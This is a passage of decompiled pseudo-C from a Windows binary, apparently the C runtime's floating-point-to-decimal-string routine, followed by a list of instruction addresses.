																__eflags = 0;
																memset( &_v468, 0, _t1207 << 2);
																_t1329 =  &(_t1329[3]);
															}
															_v472 = _v1884;
														}
													} else {
														L35:
														_v1400 = 0;
														_v472 = 0;
														E009FF705( &_v468, _t1311,  &_v1396, 0);
														_t1329 =  &(_t1329[4]);
													}
													_t1104 = 4;
													_v1396 = _t1104;
													_push(_t1104);
												}
												goto L52;
											}
											goto L53;
										}
										L52:
										_v1392 = _v1392 & 0x00000000;
										_push( &_v1396);
										_v936 = _t1123;
										_push(_t1311);
										_push( &_v932);
										_v1400 = _t1123;
										E009FF705();
										_t1331 =  &(_t1329[4]);
									}
									_t864 = _v1904;
									_t1155 = 0xa;
									_v1912 = _t1155;
									__eflags = _t864;
									if(_t864 < 0) {
										_t865 =  ~_t864;
										_t866 = _t865 / _t1155;
										_v1892 = _t866;
										_t1156 = _t865 % _t1155;
										_v1920 = _t1156;
										__eflags = _t866;
										if(_t866 == 0) {
											L246:
											__eflags = _t1156;
											if(_t1156 != 0) {
												_t912 =  *(0xa17b84 + _t1156 * 4);
												_v1884 = _t912;
												__eflags = _t912;
												if(_t912 == 0) {
													L258:
													__eflags = 0;
													_push(0);
													_v472 = 0;
													_v2408 = 0;
													goto L259;
												} else {
													__eflags = _t912 - _t1123;
													if(_t912 != _t1123) {
														_t1166 = _v472;
														__eflags = _t1166;
														if(_t1166 != 0) {
															_v1872 = _v1872 & 0x00000000;
															_t1273 = 0;
															__eflags = 0;
															do {
																_t1232 = _t912 *  *(_t1326 + _t1273 * 4 - 0x1d0) >> 0x20;
																 *(_t1326 + _t1273 * 4 - 0x1d0) = _t912 *  *(_t1326 + _t1273 * 4 - 0x1d0) + _v1872;
																_t912 = _v1884;
																asm("adc edx, 0x0");
																_t1273 = _t1273 + 1;
																_v1872 = _t1232;
																__eflags = _t1273 - _t1166;
															} while (_t1273 != _t1166);
															__eflags = _t1232;
															if(_t1232 != 0) {
																_t919 = _v472;
																__eflags = _t919 - 0x73;
																if(_t919 >= 0x73) {
																	goto L258;
																} else {
																	 *(_t1326 + _t919 * 4 - 0x1d0) = _t1232;
																	_v472 = _v472 + 1;
																}
															}
														}
													}
												}
											}
										} else {
											do {
												__eflags = _t866 - 0x26;
												if(_t866 > 0x26) {
													_t866 = 0x26;
												}
												_t1167 =  *(0xa17aee + _t866 * 4) & 0x000000ff;
												_v1900 = _t866;
												_v1400 = ( *(0xa17aee + _t866 * 4) & 0x000000ff) + ( *(0xa17aef + _t866 * 4) & 0x000000ff);
												E009FA270(_t1167 << 2,  &_v1396, 0, _t1167 << 2);
												_t930 = E009F9CF0( &(( &_v1396)[_t1167]), 0xa171e8 + ( *(0xa17aec + _v1900 * 4) & 0x0000ffff) * 4, ( *(0xa17aef + _t866 * 4) & 0x000000ff) << 2);
												_t1276 = _v1400;
												_t1331 =  &(_t1331[6]);
												__eflags = _t1276 - _t1123;
												if(_t1276 > _t1123) {
													__eflags = _v472 - _t1123;
													if(_v472 > _t1123) {
														__eflags = _t1276 - _v472;
														_t1233 =  &_v1396;
														_t548 = _t1276 - _v472 > 0;
														__eflags = _t548;
														_t931 = _t930 & 0xffffff00 | _t548;
														if(_t548 >= 0) {
															_t1233 =  &_v468;
														}
														_v1876 = _t1233;
														_t1168 =  &_v468;
														__eflags = _t931;
														if(_t931 == 0) {
															_t1168 =  &_v1396;
														}
														_v1872 = _t1168;
														__eflags = _t931;
														if(_t931 == 0) {
															_t1169 = _v472;
															_v1880 = _t1169;
														} else {
															_t1169 = _t1276;
															_v1880 = _t1276;
														}
														__eflags = _t931;
														if(_t931 != 0) {
															_t1276 = _v472;
														}
														_t932 = 0;
														_t1313 = 0;
														_v1864 = 0;
														__eflags = _t1169;
														if(_t1169 == 0) {
															L240:
															_v472 = _t932;
															_t1311 = 0x1cc;
															_t933 = _t932 << 2;
															__eflags = _t933;
															_push(_t933);
															_t934 =  &_v1860;
															goto L241;
														} else {
															do {
																__eflags =  *(_t1233 + _t1313 * 4);
																if( *(_t1233 + _t1313 * 4) != 0) {
																	_t1236 = 0;
																	_t1170 = _t1313;
																	_v1868 = _v1868 & 0;
																	_v1908 = 0;
																	__eflags = _t1276;
																	if(_t1276 == 0) {
																		L237:
																		__eflags = _t1170 - 0x73;
																		if(_t1170 == 0x73) {
																			goto L255;
																		} else {
																			_t1169 = _v1880;
																			_t1233 = _v1876;
																			goto L239;
																		}
																	} else {
																		while(1) {
																			__eflags = _t1170 - 0x73;
																			if(_t1170 == 0x73) {
																				goto L232;
																			}
																			__eflags = _t1170 - _t932;
																			if(_t1170 == _t932) {
																				 *(_t1326 + _t1170 * 4 - 0x740) =  *(_t1326 + _t1170 * 4 - 0x740) & 0x00000000;
																				_t952 = _v1868 + 1 + _t1313;
																				__eflags = _t952;
																				_v1864 = _t952;
																			}
																			_t945 =  *(_v1872 + _v1868 * 4);
																			_t1238 = _v1876;
																			_t1236 = _t945 *  *(_t1238 + _t1313 * 4) >> 0x20;
																			asm("adc edx, 0x0");
																			 *(_t1326 + _t1170 * 4 - 0x740) =  *(_t1326 + _t1170 * 4 - 0x740) + _t945 *  *(_t1238 + _t1313 * 4) + _v1908;
																			asm("adc edx, 0x0");
																			_t949 = _v1868 + 1;
																			_t1170 = _t1170 + 1;
																			_v1868 = _t949;
																			__eflags = _t949 - _t1276;
																			_v1908 = _t1236;
																			_t932 = _v1864;
																			if(_t949 != _t1276) {
																				continue;
																			} else {
																				goto L232;
																			}
																			while(1) {
																				L232:
																				__eflags = _t1236;
																				if(_t1236 == 0) {
																					goto L237;
																				}
																				__eflags = _t1170 - 0x73;
																				if(_t1170 == 0x73) {
																					L255:
																					_t1311 = 0x1cc;
																					goto L256;
																				} else {
																					__eflags = _t1170 - _t932;
																					if(_t1170 == _t932) {
																						_t604 = _t1326 + _t1170 * 4 - 0x740;
																						 *_t604 =  *(_t1326 + _t1170 * 4 - 0x740) & 0x00000000;
																						__eflags =  *_t604;
																						_t610 = _t1170 + 1; // 0x1
																						_v1864 = _t610;
																					}
																					_t943 = _t1236;
																					_t1236 = 0;
																					 *(_t1326 + _t1170 * 4 - 0x740) =  *(_t1326 + _t1170 * 4 - 0x740) + _t943;
																					_t932 = _v1864;
																					asm("adc edx, edx");
																					_t1170 = _t1170 + 1;
																					continue;
																				}
																				goto L243;
																			}
																			goto L237;
																		}
																		goto L232;
																	}
																} else {
																	__eflags = _t1313 - _t932;
																	if(_t1313 == _t932) {
																		 *(_t1326 + _t1313 * 4 - 0x740) =  *(_t1326 + _t1313 * 4 - 0x740) & 0x00000000;
																		_t567 = _t1313 + 1; // 0x1
																		_t932 = _t567;
																		_v1864 = _t932;
																	}
																	goto L239;
																}
																goto L243;
																L239:
																_t1313 = _t1313 + 1;
																__eflags = _t1313 - _t1169;
															} while (_t1313 != _t1169);
															goto L240;
														}
													} else {
														_t1311 = 0x1cc;
														_v1872 = _v468;
														_v472 = _t1276;
														E009FF705( &_v468, 0x1cc,  &_v1396, _t1276 << 2);
														_t960 = _v1872;
														_t1331 =  &(_t1331[4]);
														__eflags = _t960;
														if(_t960 != 0) {
															__eflags = _t960 - _t1123;
															if(_t960 == _t1123) {
																goto L242;
															} else {
																__eflags = _v472;
																if(_v472 == 0) {
																	goto L242;
																} else {
																	_v1884 = _v472;
																	_t1172 = 0;
																	_t1277 = 0;
																	__eflags = 0;
																	do {
																		_t1234 = _t960 *  *(_t1326 + _t1277 * 4 - 0x1d0) >> 0x20;
																		 *(_t1326 + _t1277 * 4 - 0x1d0) = _t960 *  *(_t1326 + _t1277 * 4 - 0x1d0) + _t1172;
																		_t960 = _v1872;
																		asm("adc edx, 0x0");
																		_t1277 = _t1277 + 1;
																		_t1172 = _t1234;
																		__eflags = _t1277 - _v1884;
																	} while (_t1277 != _v1884);
																	__eflags = _t1172;
																	if(_t1172 == 0) {
																		goto L242;
																	} else {
																		_t963 = _v472;
																		__eflags = _t963 - 0x73;
																		if(_t963 >= 0x73) {
																			L256:
																			_v2408 = 0;
																			_v472 = 0;
																			E009FF705( &_v468, _t1311,  &_v2404, 0);
																			_t1331 =  &(_t1331[4]);
																			_t937 = 0;
																		} else {
																			 *(_t1326 + _t963 * 4 - 0x1d0) = _t1172;
																			_v472 = _v472 + 1;
																			goto L242;
																		}
																	}
																}
															}
														} else {
															_v2408 = _t960;
															_v472 = _t960;
															_push(_t960);
															_t934 =  &_v2404;
															L241:
															_push(_t934);
															_push(_t1311);
															_push( &_v468);
															E009FF705();
															_t1331 =  &(_t1331[4]);
															L242:
															_t937 = _t1123;
														}
													}
												} else {
													_t1278 = _v1396;
													__eflags = _t1278;
													if(_t1278 != 0) {
														__eflags = _t1278 - _t1123;
														if(_t1278 == _t1123) {
															goto L194;
														} else {
															__eflags = _v472;
															if(_v472 == 0) {
																goto L194;
															} else {
																_t1173 = 0;
																_v1884 = _v472;
																_t1314 = 0;
																__eflags = 0;
																do {
																	_t965 = _t1278;
																	_t1235 = _t965 *  *(_t1326 + _t1314 * 4 - 0x1d0) >> 0x20;
																	 *(_t1326 + _t1314 * 4 - 0x1d0) = _t965 *  *(_t1326 + _t1314 * 4 - 0x1d0) + _t1173;
																	asm("adc edx, 0x0");
																	_t1314 = _t1314 + 1;
																	_t1173 = _t1235;
																	__eflags = _t1314 - _v1884;
																} while (_t1314 != _v1884);
																__eflags = _t1173;
																if(_t1173 == 0) {
																	goto L194;
																} else {
																	_t968 = _v472;
																	__eflags = _t968 - 0x73;
																	if(_t968 >= 0x73) {
																		_v2408 = 0;
																		_v472 = 0;
																		E009FF705( &_v468, 0x1cc,  &_v2404, 0);
																		_t1331 =  &(_t1331[4]);
																		_t937 = 0;
																		goto L195;
																	} else {
																		 *(_t1326 + _t968 * 4 - 0x1d0) = _t1173;
																		_v472 = _v472 + 1;
																		goto L194;
																	}
																}
															}
														}
														goto L261;
													} else {
														__eflags = 0;
														_v2408 = 0;
														_v472 = 0;
														E009FF705( &_v468, 0x1cc,  &_v2404, 0);
														_t1331 =  &(_t1331[4]);
														L194:
														_t937 = _t1123;
													}
													L195:
													_t1311 = 0x1cc;
												}
												L243:
												__eflags = _t937;
												if(_t937 == 0) {
													_v2408 = _v2408 & 0x00000000;
													_v472 = _v472 & 0x00000000;
													_push(0);
													L259:
													_push( &_v2404);
													_t915 =  &_v468;
													goto L260;
												} else {
													goto L244;
												}
												goto L261;
												L244:
												_t866 = _v1892 - _v1900;
												__eflags = _t866;
												_v1892 = _t866;
											} while (_t866 != 0);
											_t1156 = _v1920;
											goto L246;
										}
									} else {
										_t977 = _t864 / _t1155;
										_v1872 = _t977;
										_t1174 = _t864 % _t1155;
										_v1920 = _t1174;
										__eflags = _t977;
										if(_t977 == 0) {
											L174:
											__eflags = _t1174;
											if(_t1174 != 0) {
												_t978 =  *(0xa17b84 + _t1174 * 4);
												_v1884 = _t978;
												__eflags = _t978;
												if(_t978 != 0) {
													__eflags = _t978 - _t1123;
													if(_t978 != _t1123) {
														_t1175 = _v936;
														__eflags = _t1175;
														if(_t1175 != 0) {
															_v1872 = _v1872 & 0x00000000;
															_t1279 = 0;
															__eflags = 0;
															do {
																_t1240 = _t978 *  *(_t1326 + _t1279 * 4 - 0x3a0) >> 0x20;
																 *(_t1326 + _t1279 * 4 - 0x3a0) = _t978 *  *(_t1326 + _t1279 * 4 - 0x3a0) + _v1872;
																_t978 = _v1884;
																asm("adc edx, 0x0");
																_t1279 = _t1279 + 1;
																_v1872 = _t1240;
																__eflags = _t1279 - _t1175;
															} while (_t1279 != _t1175);
															__eflags = _t1240;
															if(_t1240 != 0) {
																_t981 = _v936;
																__eflags = _t981 - 0x73;
																if(_t981 >= 0x73) {
																	goto L176;
																} else {
																	 *(_t1326 + _t981 * 4 - 0x3a0) = _t1240;
																	_v936 = _v936 + 1;
																}
															}
														}
													}
												} else {
													L176:
													_v2408 = 0;
													_v936 = 0;
													_push(0);
													goto L180;
												}
											}
										} else {
											do {
												__eflags = _t977 - 0x26;
												if(_t977 > 0x26) {
													_t977 = 0x26;
												}
												_t1176 =  *(0xa17aee + _t977 * 4) & 0x000000ff;
												_v1876 = _t977;
												_v1400 = ( *(0xa17aee + _t977 * 4) & 0x000000ff) + ( *(0xa17aef + _t977 * 4) & 0x000000ff);
												E009FA270(_t1176 << 2,  &_v1396, 0, _t1176 << 2);
												_t994 = E009F9CF0( &(( &_v1396)[_t1176]), 0xa171e8 + ( *(0xa17aec + _v1876 * 4) & 0x0000ffff) * 4, ( *(0xa17aef + _t977 * 4) & 0x000000ff) << 2);
												_t1282 = _v1400;
												_t1331 =  &(_t1331[6]);
												__eflags = _t1282 - _t1123;
												if(_t1282 > _t1123) {
													__eflags = _v936 - _t1123;
													if(_v936 > _t1123) {
														__eflags = _t1282 - _v936;
														_t1241 =  &_v1396;
														_t338 = _t1282 - _v936 > 0;
														__eflags = _t338;
														_t995 = _t994 & 0xffffff00 | _t338;
														if(_t338 >= 0) {
															_t1241 =  &_v932;
														}
														_v1900 = _t1241;
														_t1177 =  &_v932;
														__eflags = _t995;
														if(_t995 == 0) {
															_t1177 =  &_v1396;
														}
														_v1880 = _t1177;
														__eflags = _t995;
														if(_t995 == 0) {
															_t1178 = _v936;
															_v1908 = _t1178;
														} else {
															_t1178 = _t1282;
															_v1908 = _t1282;
														}
														__eflags = _t995;
														if(_t995 != 0) {
															_t1282 = _v936;
														}
														_t996 = 0;
														_t1316 = 0;
														_v1864 = 0;
														__eflags = _t1178;
														if(_t1178 == 0) {
															L168:
															_v936 = _t996;
															_t1311 = 0x1cc;
															_t997 = _t996 << 2;
															__eflags = _t997;
															_push(_t997);
															_t998 =  &_v1860;
															goto L169;
														} else {
															do {
																__eflags =  *(_t1241 + _t1316 * 4);
																if( *(_t1241 + _t1316 * 4) != 0) {
																	_t1244 = 0;
																	_t1179 = _t1316;
																	_v1868 = _v1868 & 0;
																	_v1892 = 0;
																	__eflags = _t1282;
																	if(_t1282 == 0) {
																		L165:
																		__eflags = _t1179 - 0x73;
																		if(_t1179 == 0x73) {
																			goto L177;
																		} else {
																			_t1178 = _v1908;
																			_t1241 = _v1900;
																			goto L167;
																		}
																	} else {
																		while(1) {
																			__eflags = _t1179 - 0x73;
																			if(_t1179 == 0x73) {
																				goto L160;
																			}
																			__eflags = _t1179 - _t996;
																			if(_t1179 == _t996) {
																				 *(_t1326 + _t1179 * 4 - 0x740) =  *(_t1326 + _t1179 * 4 - 0x740) & 0x00000000;
																				_t1016 = _v1868 + 1 + _t1316;
																				__eflags = _t1016;
																				_v1864 = _t1016;
																			}
																			_t1009 =  *(_v1880 + _v1868 * 4);
																			_t1246 = _v1900;
																			_t1244 = _t1009 *  *(_t1246 + _t1316 * 4) >> 0x20;
																			asm("adc edx, 0x0");
																			 *(_t1326 + _t1179 * 4 - 0x740) =  *(_t1326 + _t1179 * 4 - 0x740) + _t1009 *  *(_t1246 + _t1316 * 4) + _v1892;
																			asm("adc edx, 0x0");
																			_t1013 = _v1868 + 1;
																			_t1179 = _t1179 + 1;
																			_v1868 = _t1013;
																			__eflags = _t1013 - _t1282;
																			_v1892 = _t1244;
																			_t996 = _v1864;
																			if(_t1013 != _t1282) {
																				continue;
																			} else {
																				goto L160;
																			}
																			while(1) {
																				L160:
																				__eflags = _t1244;
																				if(_t1244 == 0) {
																					goto L165;
																				}
																				__eflags = _t1179 - 0x73;
																				if(_t1179 == 0x73) {
																					L177:
																					__eflags = 0;
																					_t1311 = 0x1cc;
																					_v2408 = 0;
																					_v936 = 0;
																					_push(0);
																					_t1004 =  &_v2404;
																					goto L178;
																				} else {
																					__eflags = _t1179 - _t996;
																					if(_t1179 == _t996) {
																						_t394 = _t1326 + _t1179 * 4 - 0x740;
																						 *_t394 =  *(_t1326 + _t1179 * 4 - 0x740) & 0x00000000;
																						__eflags =  *_t394;
																						_t400 = _t1179 + 1; // 0x1
																						_v1864 = _t400;
																					}
																					_t1007 = _t1244;
																					_t1244 = 0;
																					 *(_t1326 + _t1179 * 4 - 0x740) =  *(_t1326 + _t1179 * 4 - 0x740) + _t1007;
																					_t996 = _v1864;
																					asm("adc edx, edx");
																					_t1179 = _t1179 + 1;
																					continue;
																				}
																				goto L171;
																			}
																			goto L165;
																		}
																		goto L160;
																	}
																} else {
																	__eflags = _t1316 - _t996;
																	if(_t1316 == _t996) {
																		 *(_t1326 + _t1316 * 4 - 0x740) =  *(_t1326 + _t1316 * 4 - 0x740) & 0x00000000;
																		_t357 = _t1316 + 1; // 0x1
																		_t996 = _t357;
																		_v1864 = _t996;
																	}
																	goto L167;
																}
																goto L171;
																L167:
																_t1316 = _t1316 + 1;
																__eflags = _t1316 - _t1178;
															} while (_t1316 != _t1178);
															goto L168;
														}
													} else {
														_t1311 = 0x1cc;
														_v1880 = _v932;
														_v936 = _t1282;
														E009FF705( &_v932, 0x1cc,  &_v1396, _t1282 << 2);
														_t1024 = _v1880;
														_t1331 =  &(_t1331[4]);
														__eflags = _t1024;
														if(_t1024 != 0) {
															__eflags = _t1024 - _t1123;
															if(_t1024 == _t1123) {
																goto L170;
															} else {
																__eflags = _v936;
																if(_v936 == 0) {
																	goto L170;
																} else {
																	_v1884 = _v936;
																	_t1181 = 0;
																	_t1283 = 0;
																	__eflags = 0;
																	do {
																		_t1242 = _t1024 *  *(_t1326 + _t1283 * 4 - 0x3a0) >> 0x20;
																		 *(_t1326 + _t1283 * 4 - 0x3a0) = _t1024 *  *(_t1326 + _t1283 * 4 - 0x3a0) + _t1181;
																		_t1024 = _v1880;
																		asm("adc edx, 0x0");
																		_t1283 = _t1283 + 1;
																		_t1181 = _t1242;
																		__eflags = _t1283 - _v1884;
																	} while (_t1283 != _v1884);
																	__eflags = _t1181;
																	if(_t1181 == 0) {
																		goto L170;
																	} else {
																		_t1027 = _v936;
																		__eflags = _t1027 - 0x73;
																		if(_t1027 >= 0x73) {
																			_v1400 = 0;
																			_v936 = 0;
																			_push(0);
																			_t1004 =  &_v1396;
																			L178:
																			_push(_t1004);
																			_push(_t1311);
																			_push( &_v932);
																			E009FF705();
																			_t1331 =  &(_t1331[4]);
																			_t1001 = 0;
																		} else {
																			 *(_t1326 + _t1027 * 4 - 0x3a0) = _t1181;
																			_v936 = _v936 + 1;
																			goto L170;
																		}
																	}
																}
															}
														} else {
															_v1400 = _t1024;
															_v936 = _t1024;
															_push(_t1024);
															_t998 =  &_v1396;
															L169:
															_push(_t998);
															_push(_t1311);
															_push( &_v932);
															E009FF705();
															_t1331 =  &(_t1331[4]);
															L170:
															_t1001 = _t1123;
														}
													}
												} else {
													_t1284 = _v1396;
													__eflags = _t1284;
													if(_t1284 != 0) {
														__eflags = _t1284 - _t1123;
														if(_t1284 == _t1123) {
															goto L121;
														} else {
															__eflags = _v936;
															if(_v936 == 0) {
																goto L121;
															} else {
																_t1182 = 0;
																_v1884 = _v936;
																_t1317 = 0;
																__eflags = 0;
																do {
																	_t1030 = _t1284;
																	_t1243 = _t1030 *  *(_t1326 + _t1317 * 4 - 0x3a0) >> 0x20;
																	 *(_t1326 + _t1317 * 4 - 0x3a0) = _t1030 *  *(_t1326 + _t1317 * 4 - 0x3a0) + _t1182;
																	asm("adc edx, 0x0");
																	_t1317 = _t1317 + 1;
																	_t1182 = _t1243;
																	__eflags = _t1317 - _v1884;
																} while (_t1317 != _v1884);
																__eflags = _t1182;
																if(_t1182 == 0) {
																	goto L121;
																} else {
																	_t1033 = _v936;
																	__eflags = _t1033 - 0x73;
																	if(_t1033 >= 0x73) {
																		_v1400 = 0;
																		_v936 = 0;
																		E009FF705( &_v932, 0x1cc,  &_v1396, 0);
																		_t1331 =  &(_t1331[4]);
																		_t1001 = 0;
																		goto L122;
																	} else {
																		 *(_t1326 + _t1033 * 4 - 0x3a0) = _t1182;
																		_v936 = _v936 + 1;
																		goto L121;
																	}
																}
															}
														}
														goto L261;
													} else {
														__eflags = 0;
														_v1864 = 0;
														_v936 = 0;
														E009FF705( &_v932, 0x1cc,  &_v1860, 0);
														_t1331 =  &(_t1331[4]);
														L121:
														_t1001 = _t1123;
													}
													L122:
													_t1311 = 0x1cc;
												}
												L171:
												__eflags = _t1001;
												if(_t1001 == 0) {
													_v2408 = _v2408 & 0x00000000;
													_t429 =  &_v936;
													 *_t429 = _v936 & 0x00000000;
													__eflags =  *_t429;
													_push(0);
													L180:
													_push( &_v2404);
													_t915 =  &_v932;
													L260:
													_push(_t1311);
													_push(_t915);
													E009FF705();
													_t1331 =  &(_t1331[4]);
												} else {
													goto L172;
												}
												goto L261;
												L172:
												_t977 = _v1872 - _v1876;
												__eflags = _t977;
												_v1872 = _t977;
											} while (_t977 != 0);
											_t1174 = _v1920;
											goto L174;
										}
									}
									L261:
									_t1157 = _v472;
									_t1268 = _v1896;
									_v1868 = _t1268;
									__eflags = _t1157;
									if(_t1157 != 0) {
										_v1872 = _v1872 & 0x00000000;
										_t1272 = 0;
										__eflags = 0;
										do {
											_t904 =  *(_t1326 + _t1272 * 4 - 0x1d0);
											_t1230 = 0xa;
											_t1231 = _t904 * _t1230 >> 0x20;
											 *(_t1326 + _t1272 * 4 - 0x1d0) = _t904 * _t1230 + _v1872;
											asm("adc edx, 0x0");
											_t1272 = _t1272 + 1;
											_v1872 = _t1231;
											__eflags = _t1272 - _t1157;
										} while (_t1272 != _t1157);
										_t1268 = _v1868;
										__eflags = _t1231;
										if(_t1231 != 0) {
											_t907 = _v472;
											__eflags = _t907 - 0x73;
											if(_t907 >= 0x73) {
												__eflags = 0;
												_v2408 = 0;
												_v472 = 0;
												E009FF705( &_v468, _t1311,  &_v2404, 0);
												_t1331 =  &(_t1331[4]);
											} else {
												 *(_t1326 + _t907 * 4 - 0x1d0) = _t1231;
												_v472 = _v472 + 1;
											}
										}
									}
									_t869 = E00A00050( &_v472,  &_v936);
									_t1139 = _v1896;
									_t1222 = 0xa;
									__eflags = _t869 - _t1222;
									if(_t869 != _t1222) {
										__eflags = _t869;
										if(_t869 != 0) {
											_t1268 = _t1139 + 1;
											 *_t1139 = _t869 + 0x30;
											_v1868 = _t1268;
											goto L276;
										} else {
											_t871 = _v1904 - 1;
											goto L277;
										}
										goto L308;
									} else {
										_t895 = _v936;
										_t1268 = _t1139 + 1;
										_v1904 = _v1904 + 1;
										 *_t1139 = 0x31;
										_v1868 = _t1268;
										_v1884 = _t895;
										__eflags = _t895;
										if(_t895 != 0) {
											_t1271 = 0;
											_t1164 = 0;
											__eflags = 0;
											do {
												_t896 =  *(_t1326 + _t1164 * 4 - 0x3a0);
												 *(_t1326 + _t1164 * 4 - 0x3a0) = _t896 * _t1222 + _t1271;
												asm("adc edx, 0x0");
												_t1164 = _t1164 + 1;
												_t1271 = _t896 * _t1222 >> 0x20;
												_t1222 = 0xa;
												__eflags = _t1164 - _v1884;
											} while (_t1164 != _v1884);
											_v1884 = _t1271;
											__eflags = _t1271;
											_t1268 = _v1868;
											if(_t1271 != 0) {
												_t1165 = _v936;
												__eflags = _t1165 - 0x73;
												if(_t1165 >= 0x73) {
													_v2408 = 0;
													_v936 = 0;
													E009FF705( &_v932, _t1311,  &_v2404, 0);
													_t1331 =  &(_t1331[4]);
												} else {
													 *((intOrPtr*)(_t1326 + _t1165 * 4 - 0x3a0)) = _v1884;
													_t723 =  &_v936;
													 *_t723 = _v936 + 1;
													__eflags =  *_t723;
												}
											}
											_t1139 = _v1896;
										}
										L276:
										_t871 = _v1904;
									}
									L277:
									 *((intOrPtr*)(_v1928 + 4)) = _t871;
									_t1216 = _v1916;
									__eflags = _t871;
									if(_t871 >= 0) {
										__eflags = _t1216 - 0x7fffffff;
										if(_t1216 <= 0x7fffffff) {
											_t1216 = _t1216 + _t871;
											__eflags = _t1216;
										}
									}
									_t873 = _a24 - 1;
									__eflags = _t873 - _t1216;
									if(_t873 >= _t1216) {
										_t873 = _t1216;
									}
									_t874 = _t873 + _t1139;
									_v1872 = _t874;
									__eflags = _t1268 - _t874;
									if(_t1268 != _t874) {
										while(1) {
											_t877 = _v472;
											__eflags = _t877;
											if(_t877 == 0) {
												goto L302;
											}
											_t1129 = 0;
											_t1269 = _t877;
											_t1160 = 0;
											__eflags = 0;
											do {
												_t878 =  *(_t1326 + _t1160 * 4 - 0x1d0);
												 *(_t1326 + _t1160 * 4 - 0x1d0) = _t878 * 0x3b9aca00 + _t1129;
												asm("adc edx, 0x0");
												_t1160 = _t1160 + 1;
												_t1129 = _t878 * 0x3b9aca00 >> 0x20;
												__eflags = _t1160 - _t1269;
											} while (_t1160 != _t1269);
											_t1270 = _v1868;
											__eflags = _t1129;
											if(_t1129 != 0) {
												_t889 = _v472;
												__eflags = _t889 - 0x73;
												if(_t889 >= 0x73) {
													__eflags = 0;
													_v2408 = 0;
													_v472 = 0;
													E009FF705( &_v468, _t1311,  &_v2404, 0);
													_t1331 =  &(_t1331[4]);
												} else {
													 *(_t1326 + _t889 * 4 - 0x1d0) = _t1129;
													_v472 = _v472 + 1;
												}
											}
											_t883 = E00A00050( &_v472,  &_v936);
											__eflags = _v472;
											_t1123 = _t1129 & 0xffffff00 | _v472 == 0x00000000;
											_v1916 = 8;
											_t1139 = _v1872 - _t1270;
											__eflags = _t1139;
											do {
												_t1227 = _t883 % _v1912;
												_v1920 = _t883 / _v1912;
												_v1884 = _t1227;
												_t886 = _t1227 + 0x30;
												_t1228 = _v1916;
												__eflags = _t1139 - _t1228;
												if(_t1139 >= _t1228) {
													 *(_t1228 + _t1270) = _t886;
												} else {
													__eflags = _t886 - 0x30;
													_t1123 = _t1123 & (_t886 & 0xffffff00 | _t886 != 0x00000030) - 0x00000001;
												}
												_t883 = _v1920;
												_t1216 = _t1228 - 1;
												_v1916 = _t1216;
												__eflags = _t1216 - 0xffffffff;
											} while (_t1216 != 0xffffffff);
											__eflags = _t1139 - 9;
											if(_t1139 > 9) {
												_t1139 = 9;
											}
											_t1268 = _t1270 + _t1139;
											_v1868 = _t1268;
											__eflags = _t1268 - _v1872;
											if(_t1268 != _v1872) {
												continue;
											}
											goto L302;
										}
									}
									L302:
									 *_t1268 = 0;
									__eflags = _t1123;
									_t876 = 0 | __eflags != 0x00000000;
									_v1884 = _t876;
									_t1123 = _t876;
									goto L308;
								}
							}
						}
					}
				} else {
					_t1139 = _t1302 & 0x000fffff;
					if((_a4 | _t1302 & 0x000fffff) == 0 || (_v1944 & 0x01000000) != 0) {
						_push(0xa19b50);
						 *((intOrPtr*)(_v1928 + 4)) =  *(_v1928 + 4) & 0x00000000;
						L12:
						_push(_a24);
						_push(_v1896);
						if(E00A03503() != 0) {
							L311:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E009FCBFC();
							asm("int3");
							_push(_t1326);
							_t1140 = _v2436;
							__eflags = _t1140 - 0xfffffffe;
							if(__eflags != 0) {
								__eflags = _t1140;
								if(__eflags < 0) {
									L317:
									 *((intOrPtr*)(E009FEBAB(__eflags))) = 9;
									E009FCBCF();
									goto L318;
								} else {
									__eflags = _t1140 -  *0xa46728; // 0x40
									if(__eflags >= 0) {
										goto L317;
									} else {
										_t826 =  *( *((intOrPtr*)(0xa46528 + (_t1140 >> 6) * 4)) + 0x28 + (_t1140 & 0x0000003f) * 0x38) & 0x40;
										__eflags = _t826;
										return _t826;
									}
								}
							} else {
								 *((intOrPtr*)(E009FEBAB(__eflags))) = 9;
								L318:
								__eflags = 0;
								return 0;
							}
						} else {
							L308:
							_t1341 = _v1932;
							_pop(_t1261);
							_pop(_t1303);
							if(_v1932 != 0) {
								E00A12676(_t1139, _t1341,  &_v1940);
							}
							_pop(_t1124);
							return E009F8F7D(_t1123, _t1124, _v8 ^ _t1326, _t1216, _t1261, _t1303);
						}
					} else {
						goto L14;
					}
				}
			}








































































































































































































































                                                                                                                                                                          0x00a0f83a
                                                                                                                                                                          0x00a0f83a
                                                                                                                                                                          0x00a0f83a
                                                                                                                                                                          0x00a0f845
                                                                                                                                                                          0x00a0f84c
                                                                                                                                                                          0x00a0f852
                                                                                                                                                                          0x00a0f85b
                                                                                                                                                                          0x00a0f867
                                                                                                                                                                          0x00a0f869
                                                                                                                                                                          0x00a0f879
                                                                                                                                                                          0x00a0f87d
                                                                                                                                                                          0x00a0f88f
                                                                                                                                                                          0x00a0f895
                                                                                                                                                                          0x00a0f87f
                                                                                                                                                                          0x00a0f87f
                                                                                                                                                                          0x00a0f87f
                                                                                                                                                                          0x00a0f89b
                                                                                                                                                                          0x00a0f89c
                                                                                                                                                                          0x00a0f89f
                                                                                                                                                                          0x00a0f8a2
                                                                                                                                                                          0x00a0f8a3
                                                                                                                                                                          0x00a0f8a5
                                                                                                                                                                          0x00a0f8b4
                                                                                                                                                                          0x00a0f8af
                                                                                                                                                                          0x00a0f8b1
                                                                                                                                                                          0x00a0f8b1
                                                                                                                                                                          0x00a0f8b6
                                                                                                                                                                          0x00a0f8c0
                                                                                                                                                                          0x00a0f8c8
                                                                                                                                                                          0x00a0f8d2
                                                                                                                                                                          0x00a0f8e1
                                                                                                                                                                          0x00a0f8e6
                                                                                                                                                                          0x00a0f930
                                                                                                                                                                          0x00a0f934
                                                                                                                                                                          0x00a0f939
                                                                                                                                                                          0x00a0f93a
                                                                                                                                                                          0x00a0f93c
                                                                                                                                                                          0x00a0f93e
                                                                                                                                                                          0x00a0f944
                                                                                                                                                                          0x00a0f944
                                                                                                                                                                          0x00a0f947
                                                                                                                                                                          0x00a0f947
                                                                                                                                                                          0x00a0f94a
                                                                                                                                                                          0x00a10cff
                                                                                                                                                                          0x00a10d07
                                                                                                                                                                          0x00a10d09
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a10d0b
                                                                                                                                                                          0x00a10d0b
                                                                                                                                                                          0x00a10d0b
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a10d0b
